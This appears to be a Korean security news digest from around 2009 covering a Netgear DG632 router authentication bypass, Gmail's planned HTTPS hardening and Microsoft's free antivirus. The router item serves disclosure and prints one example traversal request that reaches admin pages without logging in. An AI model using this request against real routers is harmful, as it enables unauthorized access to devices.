     Netgear DG632 라우터에서 인증 미흡으로 인하여 관리자의 페이지를 확인 할 수 있는 취약점이 발견되었습니다. 이 라우터는 웹에서 접근가능한 관리 인터페이스를 가지고 있어, 사용자 인증 성공에 따라 상대적인 페이지로 Redirec 됩니다. 이때, 공격자는 간단한 조작으로 인증을 우회하여 파일이나 데이터에 접근 할 수 있습니다. 이는 상당히 위험한 결과를 초래할 수 있기 때문에 관련 장비를 사용하는 분들의 빠른 패치를 권고합니다.

Ex)  /cgi-bin/webcm?nextpage=../html/modemmunu.htm

아래 링크를 클릭하시면 자세한 내용을 확인 하실 수 있습니다.

    가. 관련 링크
         (1) http://www.tomneaves.co.uk/Netgear_DG632_Authentication_Bypass.txt
        



2. 구글, 지메일에 보안 강화기술 테스트 예정
     세계 1위 검색업체 구글의 메일 서비스인 지메일이 보안에 취약하다는 문제점이 제기되면서, 이를 해결하기 위한 노력의 일환으로 보안 강화기술 테스트를 실시할 예정이라고 합니다. 현재 지메일 계정으로 로그인 할 때는 HTTPS(Hypertext Transfer Protocol Secure)를 사용하고 있으나, 이후 연결에서는 이를 사용하지 않아 세션 하이재킹과 같은 위험에 노출될 우려가 있다고 합니다. 이 문제가 지메일만의 문제는 아니지만, 세계에서 가장 많이 쓰이는 서비스이다 보니 많은 사람들의 주목을 받기가 쉽기 때문에 그 만큼의 책임도 회피할 수는 없을 것 같습니다. 
    
    가. 관련 링크
         (1) http://www.idg.co.kr/newscenter/common/newCommonView.do?newsId=56820



3. MS 무료백신 23일 개봉
      MicroSoft가 이번에는 무료백신을 내놓아 보안업계를 긴장시키고 있습니다. 이번에 무료로 공개되는 백신 - 에센셜(Microsoft Security Essential)은 이전 유료버전이었던 원케어와는 달리 매우 빠른 속도를 자랑한다고 합니다. 이에대해 관련 업체들에서는 회의적인 시각이 다분하지만, 최종 결과가 어떻게 될지는 좀 더 지켜봐야 할 것입니다. 자세한 내용 및 무료 다운로드를 원하시는 분들은 아래 링크를 참조하시기 바랍니다.

    가. 관련 링크
         (1) http://workspace.officelive.com/ko-KR/

         (2) http://www.zdnet.co.kr/ArticleView.asp?artice_id=20090619093447
         (3) http://arstechnica.com/microsoft/news/2009/06/leaked-microsoft-security-essentials-codename-morro.ars